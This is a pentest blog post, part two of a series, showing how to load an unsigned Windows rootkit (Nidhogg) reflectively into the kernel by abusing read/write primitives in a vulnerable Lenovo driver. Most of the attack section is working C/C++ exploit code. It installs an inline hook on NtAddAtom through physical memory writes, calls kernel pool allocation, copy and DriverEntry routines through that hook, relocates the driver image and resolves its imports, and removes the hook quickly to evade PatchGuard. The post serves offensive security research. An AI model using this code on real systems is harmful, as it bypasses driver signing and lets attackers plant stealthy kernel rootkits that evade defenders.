BYOVD to the next level (part 2) — rootkit like it's 2025

Posted Thu 09 October 2025
Author Luis Casvella
Category Pentest
Tags 2025, windows, driver, pentest, vulnerability, exploit, CVE-2025-8061

Bring Your Own Vulnerable Driver (BYOVD) is a well-known post-exploitation technique used by adversaries. This blog post is part of a series. In part one we saw how to abuse a vulnerable driver to gain access to Ring-0 capabilities. In this second and final part, we provide a technical explanation on how to perform reflective driver loading.

Introduction

In the first part of this series, we saw how a driver could be exploited via logical bugs and gained exploitation primitives such as:

Arbitrary read/write on MSR registers.
Read/write to physical memory address via insecure calls to MmMapIoSpace().

Having demonstrated Local Privilege Escalation (LPE) exploitation, we will now see how to go even further! Let's do a deep dive into the Windows Kernel and see how an attacker can abuse R/W primitives to manually map their own unsigned driver and completely bypass Driver Signature Enforcement (DSE).

👀 Please make sure to read the first part
This blog post is the direct continuation of the first part available here!

State of art on Reflective Driver Loading

First, let's define what "Reflective Driver Loading" is. Reflective loading refers to the ability of a program to load an executable directly from memory instead of from a file using the normal OS loading method. Because it bypasses disk-based loading and standard OS mechanisms, reflective loading has been widely used by malware to hide its execution. As this technique can be used to hide the execution of a .DLL or an .EXE, it can also be used to load a driver directly into kernel memory.

During my research on reflective driver loading I found surprisingly few public write-ups, which motivated me to document how the technique works. Most of the material I did find came from game-cheat developers on the UnknownCheats forum. Because anti-cheat systems operate at kernel privilege, cheat authors commonly use drivers to manipulate game state, and there is a notable overlap between the capabilities used by cheat developers and those used by red teams against EDR. A widely used tool from that community is kdmapper which implements reflective loading of unsigned drivers; many of the techniques discussed in this article are inspired by kdmapper’s approach.

Kdmapper uses a well-known vulnerable driver named iqvw64e.sys to obtain an arbitrary R/W primitive on virtual and physical addresses. Because this driver is now detected and blacklisted by Microsoft, it is unsuitable in Red Team engagements. The mapping techniques kdmapper introduced, however, are transferable: by substituting a different, undetected vulnerable driver you can achieve the same results, with similar primitives. So let's reuse the vulnerabilities found in LnvMSRIO.sys that I presented in the first blog and uses these primitives to load our unsigned driver (basically, a rootkit).

Gaining unrestricted kernel code execution

Invoking Windows NT Kernel API

With the MSR write primitive we demonstrated a simple privilege escalation and ran userland-allocated shellcode in ring 0 to steal a SYSTEM token. However, the primitive’s power goes well beyond that. Once your payload executes in kernel context it can directly call functions inside ntoskrnl.exe and reuse kernel-internal APIs. To do so, you need to resolve the kernel addresses of the target functions.

A common, straightforward workflow is to map the same ntoskrnl.exe image in user mode, use GetProcAddress() to obtain the export’s offset inside that image, and then add that offset to the kernel’s runtime base address to compute the function’s kernel-space address. This yields a quick way to call exported kernel routines from your ring-0 payload. Here is quick code snippet in C/C++ to do that:

// Get exported function offset from a library
uint64_t GetFunctionOffsetFromModule(const char* ModuleName, const char* FunctionName) {
    HMODULE hModule = LoadLibraryA(ModuleName);
    if (!hModule) return 0;
    uint64_t qFunctionOffset = (DWORD64)GetProcAddress(hModule, FunctionName) - (uint64_t)hModule;
    FreeLibrary(hModule);
    return qFunctionOffset;
}

// Get address of a function exported by ntoskrnl.exe 
uint64_t GetKRoutine(uint64_t qKernelBase, const char* FunctionName){
    uint64_t qFunctionOffset = GetFunctionOffsetFromModule("C:\\Windows\\System32\\ntoskrnl.exe", FunctionName);
    uint64_t functionAddr =(uint64_t)(KernelBase + qFunctionOffset);
    return functionAddr;
}

Then, we can call the GetKRoutine() function to retrieve any exported function in the Windows Kernel.

uint64_t qDbgPrint = GetKRoutine(qKernelBaseAddress, "DbgPrint");

Finally, we can use the MSR write primitive and make a direct call to the function pointer qDbgPrint() (after preparing the stack to store the needed parameters). Now, let's abuse this to reflective load an unsigned driver into the Windows kernel.

Windows Internals

However, before loading our own unsigned driver, we need to know a few things about the kernel internals.

Windows pool allocation

The Windows pool is the kernel’s general-purpose allocator for variable-sized memory chunks and it is very similar to a user-mode heap but with important differences. In fact, pool allocations live in kernel space and are globally visible to all kernel-mode components, and because of that, corrupting pool memory can affect the whole kernel, causing driver failures or a system crash (BSOD). It is critical to treat pool operations with care and validate sizes, tags, and lifetimes to avoid destabilizing the system.

To ensure the integrity of Windows pool areas, every allocated chunks starts with this header:

// https://www.vergiliusproject.com/kernels/x64/windows-11/24h2/_POOL_HEADER

//0x10 bytes (sizeof)
struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize:8;       //0x0
            USHORT PoolIndex:8;          //0x0
            USHORT BlockSize:8;          //0x2
            USHORT PoolType:8;           //0x2
        };
        ULONG Ulong1;                    //0x0
    };
    ULONG PoolTag;                       //0x4
    union
    {
        struct _EPROCESS* ProcessBilled; //0x8
        struct
        {
            USHORT AllocatorBackTraceIndex;  //0x8
            USHORT PoolTagHash;              //0xa
        };
    };
};

In this header, we can find some valuable information about the memory chunks, such as its size (BlockSize), its type (PoolType) and its tag (PoolTag).

The PoolTag is just a short identifier specified when allocating the region. Usually, it is an ULONG representing four ASCII characters, and can be useful for debug purposes.

The different pool types are hopefully documented by Microsoft. Dozens of pool types are available but they can be distingued between two main different groups:

PagedPool, which will be allocated in a memory region that can be cached on the disk for optimization, just like a swap.
NonPagedPool, which will always be available in RAM.

Interrupt Request Level (IRQL)

Interrupt Request Level (IRQL) defines the CPU’s priority. Higher IRQLs block delivery of lower-priority interrupts and restrict which kernel services and memory types the running code may safely access. Normal thread and most kernel code execute at PASSIVE_LEVEL (IRQL 0), which is the lowest IRQL and allows access to pageable memory and most kernel routines. However, some specialized contexts run at higher IRQL, which can cause system crashes when accessing paged pool area. During the execution of the exploit of the MSR write primitive, as the code execution is done by hijacking the syscall handler in the kernel itself, the IRQL is set to a high value.

But why is it so important ?

As I mentioned, running at a high IRQL prevents the kernel from executing many internal functions, in particular any routine that touches pageable memory. At high IRQL, the kernel may not access pages that can be paged out and calling such routines or copying from/to pageable memory commonly triggers a BSOD with the code IRQL_NOT_LESS_OR_EQUAL. To freely call those APIs and safely access pageable pool, code must execute at PASSIVE_LEVEL. That means, in practice, you must execute your payload in a low-IRQL context.

Hooking the kernel

The goal is to redirect execution into a context that runs at a low IRQL. To achieve this, we can place an inline hook on a specific syscall implementation inside ntoskrnl.exe and then invoke that syscall from user mode. That way, the code-execution primitive is exercised from the syscall’s implementation itself (which runs at PASSIVE_LEVEL), rather than from a direct hijack of KiSystemCall64().

The chosen target is NtAddAtom(), because it is rarely used by typical user application and is therefore a convenient and low-noise entry point.

The main obstacle is that ntoskrnl.exe is mapped in kernel memory as read only, so we cannot patch it directly through ordinary write. To bypass this restriction, we can use the physical read/write primitive described in the previous blog post. The physical memory can be mapped into a virtual address space with MmMapIoSpace(), which returns a writable region (even when the source area is read-only !). Using that writable mapping we can install an inline jump at the start of the NtAddAtom() stub that redirects execution to a handler or trampoline.

🛡️ Kernel Patch Protection (KPP) a.k.a PatchGuard
When setting hooks in the kernel, PatchGuard might catch those and cause BSOD. Therefore, those hooks needs to be removed as quickly as possible to keep the integrity of the kernel.

In order to use the physical read/write primitive, we need to know the physical address of NtAddAtom(). Hopefully, we can obtain it by simply abusing the MSR read/write primitive, and call MmGetPhysicalAddress(), as this function allows us to retrieve the physical address corresponding to a given virtual address.

Figure 1 - Documentation of MmGetPhyisicalAddress().

Using the physical R/W primitive, we can patch the NtAddAtom() stub to redirect execution to another kernel function by inserting a jump at the start of the stub. In practice this is implemented with a small trampoline that redirects control to another region and then restores the original bytes to not trigger PatchGuard. The physical mapping lets us modify the kernel pages in-place so the hook takes effect when the syscall is invoked.

Trampoline stub (Replace XXXXXXXXXXXXXXXX with the address of any function inside ntoskrnl.exe):

0:  48 b8 XX XX XX XX XX    movabs rax, 0hXXXXXXXXXXXXXXXX
7:  XX XX XX
a:  ff e0                   jmp    rax

Figure 2 - Schema of the inline hook placement in the NtAddAtom() stub.

Finally, we just have to call NtAddAtom() from the userland, which is exported in the ntdll.dll. During the syscall journey, this will call NtAddAtom() in the ntoskrnl.exe and trigger the hook, which will redirect the execution flow to an arbitrary windows kernel function, for example: ExAllocatePoolWithTag(). Finally, right after the execution, we need to remove the hook to ensure we will not get caught by PatchGuard.

Figure 3 - Schema of the execution of a kernel function (ExAllocatePoolWithTag() as an example) with the hook.

Reflective Driver Loading

In this section, we will see how to do a reflective load of a Windows driver. For testing purpose, we will take Nidhogg, which is a Windows Rootkit with many usefull offensive functionnalities. This driver needs to be compiled with -Gs option, which disable security features checks and also add the definition DRIVER_REFLECTIVELY_LOADED.

Allocate memory for our new unsigned driver

To allocate pool memory in kernel space we call ExAllocatePoolWithTag(). Before allocating, we need to read the driver image to determine the exact required size. This ensures you reserve a block large enough for any payload.

    /* 1.2 - Prepare driver data */
    const std::wstring driver_path = L"C:/path/to/Nidhogg.sys";
    std::vector<uint8_t> raw_image = { 0 };
    if (!ReadFileToMemory(driver_path, &raw_image)) {
        printf("[-] Failed to read image to memory");
        return;
    }
    const PIMAGE_NT_HEADERS64 nt_headers = PE::GetNtHeaders(raw_image.data());
    image_size = nt_headers->OptionalHeader.SizeOfImage;

Then, we can use the hooking technique to make a call to ExAllocatePoolWithTag().

// Import struct from https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ne-wdm-_pool_type
typedef enum _POOL_TYPE {
    NonPagedPool,
    NonPagedPoolExecute = NonPagedPool,
    PagedPool,
    NonPagedPoolMustSucceed = NonPagedPool + 2,
    DontUseThisType,
    NonPagedPoolCacheAligned = NonPagedPool + 4,
    PagedPoolCacheAligned,
    NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
    MaxPoolType,
    NonPagedPoolBase = 0,
    NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
    NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
    NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
    NonPagedPoolSession = 32,
    PagedPoolSession = NonPagedPoolSession + 1,
    NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
    DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
    NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
    PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
    NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
    NonPagedPoolNx = 512,
    NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
    NonPagedPoolSessionNx = NonPagedPoolNx + 32,

} POOL_TYPE;

// Excutes ExAllocatePoolWithTag() from user-land by abusing R/W primitive to hook NtAddAtom() 
PVOID _ExAllocatePoolWithTag(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag){

    // Retrieve NtAddAtom() address in userland
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == 0) {
        return nullptr;
    }

    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    if (!NtAddAtom){
        return nullptr;
    }

    // Trampoline stub
    char hook[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 }; // movabs rax, ADDRESS ; jmp [rax] ;

    // Place address of ExAllocatePoolWithTag in the trampoline
    memcpy(hook + 2, &pExAllocatePoolWithTag, 8);

    // Store original bytes in NtAddAtom() prologue
    unsigned char* original_bytes = (unsigned char*)ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12);

    // Write hook trampoline
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, hook, 12);

    // Verifying the hook is correctly set
    char* modified_bytes = ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); 
    assert((unsigned char)modified_bytes[0] == 0x48 && (unsigned char)modified_bytes[1] == 0xb8 && (unsigned char)modified_bytes[10] == 0xff && (unsigned char)modified_bytes[11] == 0xe0);

    // Prepare the stack with argument for ExAllocatePoolWithTag() and call NtAddAtom()
    using FunctionFn = VOID(__stdcall*)(POOL_TYPE, SIZE_T, ULONG);
    const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);
    PVOID out_result = Function(PoolType, NumberOfBytes, Tag);

    // Restore NtAddAtom() stub
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, (char*)original_bytes, 12);

    return out_result;
}

Then, we can just call this function to hook NtAddAtom(), make the call to ExAllocatePoolWithTag() and unhook. The size needed is the size of the image of the driver. For the tag, you can put anything you want, for this example, I will use the tag VULN.

uint64_t ExAllocatePoolWithTag_Result = (uint64_t) _ExAllocatePoolWithTag(NonPagedPool, image_size, (ULONG)'NLUV');
printf("[+] Pool allocated at 0x%llX\n", ExAllocatePoolWithTag_Result);

🔄 Endianess
Note that due to endianess, the pool tag is written backward in the allocation block header. The tag "VULN" is therefore correct in WinDbg.

Result:

Figure 4 - Result of the allocation.

To ensure the allocation is correct, we can use WinDbg to get the information about the pool allocated at the given address with the command kd> !pool <address>. Below, you can see that WinDbg correctly found a large nonpaged pool with the tag we have set earlier.

Figure 5 - Allocation pool correctly set in WinDbg.

Resolve imports and relocation

The allocation page that we have allocated will be where the driver will be written and executed. By default, the page allocated with NonPagedPool pool type are RWX region, so we do not need to change the memory page permission.

However, we need to relocate the driver and resolve the imports. As you might know, .sys files are just Portable Executables (PE). The main pratical difference between .dll and .exe is that drivers typically import from the kernel image (ntoskrnl.exe) rather than user-mode libraries. The implementation of the import resolver showed below simplifies things by assuming all imports resolve into the kernel image itself but it seems to work fine for all the unsigned drivers I tested.

PE parsing and reflective loading work the same in kernel space as in user space. The only difference is the target base. For convenience I build and relocate the image in userland, allocate a temporary buffer with VirtualAlloc(), apply relocations using the pool base obtained from ExAllocatePoolWithTag() and then copy the prepared image into the kernel pool. The copy is performed using the physical read/write primitive so the kernel pool receives the fully-relocated image ready to execute.

/* 9 - Map Driver */
/* 9.1 - Map driver in local memory */
uint64_t local_image_base;
uint64_t qEntryPointAddress = MapDriver(raw_image.data(), raw_image.size(), qKernelBaseAddress, ExAllocatePoolWithTag_Result, &local_image_base, false);

printf("[+] Local image base : 0x%llX\n", local_image_base);
printf("[+] Local image size : %lld bytes\n", image_size);
assert(qEntryPointAddress != 0);
assert(local_image_base != 0);

The code snippets below are taken from kdmapper (slighty modified):

Main reflective driver mapping function:

// This function allocate a user-land memory region and map the driver in it with a given base address named AllocatedPoolVA. 
ULONG64 MapDriver(unsigned char* DriverData, uint64_t Size, uint64_t KernelBase, uint64_t AllocationPoolVA, uint64_t* local_image, bool destroyHeader) {
    const PIMAGE_NT_HEADERS64 nt_headers = PE::GetNtHeaders(DriverData);
    auto kernel_image_base = AllocationPoolVA;

    if (!nt_headers) {
        printf("[-] Invalid format of PE image\n");
        return false;
    }
    if (nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
        printf("[-] PE is not 64 bits\n");
        return false;
    }

    // Get size of the driver image
    ULONG32 image_size = nt_headers->OptionalHeader.SizeOfImage;

    // Allocate user-land memory region as temp buffer.
    void* local_image_base = VirtualAlloc(nullptr, image_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    printf("[+] Preparing driver in local memory at 0x%llX\n", local_image_base);

    if (!local_image_base)
        return false;

    DWORD TotalVirtualHeaderSize = (IMAGE_FIRST_SECTION(nt_headers))->VirtualAddress;

    // Copy image headers
    memcpy(local_image_base, DriverData, nt_headers->OptionalHeader.SizeOfHeaders);

    // Copy image sections
    const PIMAGE_SECTION_HEADER current_image_section = IMAGE_FIRST_SECTION(nt_headers);

        for (auto i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
            if ((current_image_section[i].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA) > 0)
                continue;
            auto local_section = reinterpret_cast<void*>(reinterpret_cast<ULONG64>(local_image_base) + current_image_section[i].VirtualAddress);
            memcpy(local_section, reinterpret_cast<void*>(reinterpret_cast<ULONG64>(DriverData) + current_image_section[i].PointerToRawData), current_image_section[i].SizeOfRawData);
        }

        ULONG64 realBase = kernel_image_base;

        if (destroyHeader) {
            kernel_image_base -= TotalVirtualHeaderSize;
        }

        // Resolve relocs and imports
        RelocateImageByDelta(PE::GetRelocs(local_image_base), kernel_image_base - nt_headers->OptionalHeader.ImageBase);

        if (!ResolveImports(PE::GetImports(local_image_base), KernelBase)) {
            return 0x00;
        }

        // Write driver to allocated pool
        *local_image = (uint64_t) local_image_base;
        const ULONG64 address_of_entry_point = kernel_image_base + nt_headers->OptionalHeader.AddressOfEntryPoint;
        return address_of_entry_point;
}

Resolve imports:

PE::vec_imports PE::GetImports(void* image_base) {
    const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base);

    if (!nt_headers)
        return {};

    // Get imports table section from the NT headers
    DWORD import_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

    // If the driver does not import any functions, early returns.
    if (!import_va)
        return {};

    vec_imports imports;

    auto current_import_descriptor = reinterpret_cast<PIMAGE_IMPORT_DESCRIPTOR>(reinterpret_cast<ULONG64>(image_base) + import_va);

    // Loop on all imports
    while (current_import_descriptor->FirstThunk) {
        ImportInfo import_info;

        // Retrieve the module information
        import_info.ModuleName = std::string(reinterpret_cast<char*>(reinterpret_cast<ULONG64>(image_base) + current_import_descriptor->Name));

        auto current_first_thunk = reinterpret_cast<PIMAGE_THUNK_DATA64>(reinterpret_cast<ULONG64>(image_base) + current_import_descriptor->FirstThunk);
        auto current_originalFirstThunk = reinterpret_cast<PIMAGE_THUNK_DATA64>(reinterpret_cast<ULONG64>(image_base) + current_import_descriptor->OriginalFirstThunk);

        // Loop on all imported function of this module
        while (current_originalFirstThunk->u1.Function) {
            ImportFunctionInfo import_function_data;

            // Retrieve functions informations
            auto thunk_data = reinterpret_cast<PIMAGE_IMPORT_BY_NAME>(reinterpret_cast<ULONG64>(image_base) + current_originalFirstThunk->u1.AddressOfData);

            import_function_data.Name = thunk_data->Name;
            import_function_data.Address = &current_first_thunk->u1.Function;

            import_info.FunctionData.push_back(import_function_data);

            ++current_originalFirstThunk;
            ++current_first_thunk;
        }

        // Add the information on a list
        imports.push_back(import_info);
        ++current_import_descriptor;
    }

    // Return the list
    return imports;
}

bool ResolveImports(PE::vec_imports imports, uint64_t kernel_image_base) {
    for (auto& current_import : imports) {
        printf("[+] Module: %s\n", current_import.ModuleName.c_str());

        // For all imports
        for (auto& current_function_data : current_import.FunctionData) {
            // Retrieve the real address of the function. (Assuming it is in ntoskrnl.exe for simplicity)
            ULONG64 function_address = GetKRoutine(kernel_image_base, current_function_data.Name.c_str());

            if (function_address == 0) {
                printf("Could not locate %s\n", current_function_data.Name.c_str());
                return false;
            }
            printf("\t[+] %s at 0x%llX\n", current_function_data.Name.c_str(), function_address);
            *current_function_data.Address = function_address;
        }
    }
    return true;
}

Relocation:

PE::vec_relocs PE::GetRelocs(void* image_base) {
    const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base);

    if (!nt_headers)
        return {};

    // Get relocation table section from the NT headers
    vec_relocs relocs;
    DWORD reloc_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;

    // If no relocation needed, early returns
    if (!reloc_va)
        return {};

    auto current_base_relocation = reinterpret_cast<PIMAGE_BASE_RELOCATION>(reinterpret_cast<ULONG64>(image_base) + reloc_va);
    const auto reloc_end = reinterpret_cast<PIMAGE_BASE_RELOCATION>(reinterpret_cast<ULONG64>(current_base_relocation) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size);

    // For each reallocation blocks
    while (current_base_relocation < reloc_end && current_base_relocation->SizeOfBlock) {
        RelocInfo reloc_info;

        // Add the relocation information in the list
        reloc_info.Address = reinterpret_cast<ULONG64>(image_base) + current_base_relocation->VirtualAddress;
        reloc_info.Item = reinterpret_cast<USHORT*>(reinterpret_cast<ULONG64>(current_base_relocation) + sizeof(IMAGE_BASE_RELOCATION));
        reloc_info.Count = (current_base_relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT);

        relocs.push_back(reloc_info);

        current_base_relocation = reinterpret_cast<PIMAGE_BASE_RELOCATION>(reinterpret_cast<ULONG64>(current_base_relocation) + current_base_relocation->SizeOfBlock);
    }

    // Return relocation list
    return relocs;
}

void RelocateImageByDelta(PE::vec_relocs relocs, const ULONG64 delta) {
    // For each relocation needed
    for (const auto& current_reloc : relocs) {
        for (auto i = 0u; i < current_reloc.Count; ++i) {
            const uint16_t type = current_reloc.Item[i] >> 12;
            const uint16_t offset = current_reloc.Item[i] & 0xFFF;

            // Add the delta to applys
            if (type == IMAGE_REL_BASED_DIR64)
                *reinterpret_cast<ULONG64*>(current_reloc.Address + offset) += delta;
        }
    }
}

Write the driver to kernel memory

Now that the driver is correctly relocated and the imported functions have been resolved, we can copy the userland region to our allocated kernel pool using the same hooking technique. To do so, we can use the function RtlCopyMemory() from ntoskrnl.exe.

void _RtlCopyMemory(void* Destination, const void* Source, size_t Length) {

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == 0) {
        return;
    }

    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    if (!NtAddAtom)
    {
        return;
    }

    // Trampoline stub
    char hook[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 }; // movabs rax, ADDRESS ; jmp [rax] ;
    // Place address of RtlCopyMemory in the trampoline
    memcpy(hook + 2, &pRtlCopyMemory, 8);
    unsigned char* original_bytes = (unsigned char*)ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Store original bytes in NtAddAtom() prologue
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, hook, 12); // Write hook trampoline
    char* modified_bytes = ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Verifying the hook is correctly set
    assert((unsigned char)modified_bytes[0] == 0x48 && (unsigned char)modified_bytes[1] == 0xb8 && (unsigned char)modified_bytes[10] == 0xff && (unsigned char)modified_bytes[11] == 0xe0);

    using FunctionFn = void(__stdcall*)(void*, const void*, size_t);
    const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);

    Function(Destination, Source, Length);

    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, (char*)original_bytes, 12); // Restore original function

    return;
}

In WinDbg, we can see the allocated pool now contains our rootkit by inspecting the content of the pool.

Figure 6 - Rootkit written in the allocated pool.

Call the entrypoint

Now, we can call the entrypoint, abusing again the hooking technique. The entrypoint is retrieved from the NT headers when mapping the driver, and resolve to the function DriverEntry().

NTSTATUS _CallDriverEntry(uint64_t Entrypoint) {

    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == 0) {
        return -1;
    }

    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    if (!NtAddAtom)
    {
        return -1;
    }

    // Trampoline stub
    char hook[12] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 }; // movabs rax, ADDRESS ; jmp [rax] ;
    // Place address of the DriverEntry in the trampoline
    memcpy(hook + 2, &Entrypoint, 8);
    unsigned char* original_bytes = (unsigned char*)ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Store original bytes in NtAddAtom() prologue
    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, hook, 12); // Write hook trampoline
    char* modified_bytes = ReadPhysicalMemory(hDevice, (ULONG64)pNtAddAtomPhysical, 12); // Verifying the hook is correctly set
    assert((unsigned char)modified_bytes[0] == 0x48 && (unsigned char)modified_bytes[1] == 0xb8 && (unsigned char)modified_bytes[10] == 0xff && (unsigned char)modified_bytes[11] == 0xe0);

    using FunctionFn = NTSTATUS(__stdcall*)(void);
    const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);

    NTSTATUS status = Function();

    WriteToPhysicalMemory(hDevice, pNtAddAtomPhysical, (char*)original_bytes, 12); // Restore original function

    return status;
}

Proof of Concept

Figure 7 - Proof of concept - Exploit result (part 1).

Figure 8 - Proof of concept - Exploit result (part 2).

With WinObj64, we can see that a new device Nidhogg appears in the devices list.

Figure 9 - List of the devices registered.

Finally, calling the NidhoggClient works fine. Here's an example to list the kernel callbacks.

Figure 10 - Nidhogg rootkit correctly callable after being reflectively loaded.

Bibliography

If you would like to learn more about our security audits and explore how we can help you, get in touch with us!

Table of contents